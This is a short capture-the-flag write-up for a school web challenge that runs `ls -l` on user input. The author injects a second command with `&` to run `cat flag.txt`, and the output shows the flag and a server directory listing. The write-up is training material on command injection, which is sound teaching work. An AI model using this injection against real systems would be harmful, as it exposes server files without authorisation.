My school was trying to teach people about the CIA triad so they made all these dumb example applications... as if they know anything about information security. Can you prove these aren't so secure?
# Challenge
It takes a file for an input and I assume it runs `ls -l`
I broke the command by supplying `1`
`**Command 'ls -l 1' returned non-zero exit status 2.**`

Since we know it's running a bash command we can try to use & to chain the command to cat out flag.txt
So our command shoud look like `ls -l & cat flag.txt`
We get our flag
```bash
flag{e56abbce7b83d62dac05e59fb1e81c68}total 16
-rw-r--r-- 1 root root   38 Sep  9 19:33 flag.txt
-rwxr-xr-x 1 root root  736 Sep  9 19:33 main.py
-rwxr-xr-x 1 root root   95 Sep  9 19:33 requirements.txt
drwxr-xr-x 1 root root 4096 Sep  9 19:33 templates
```
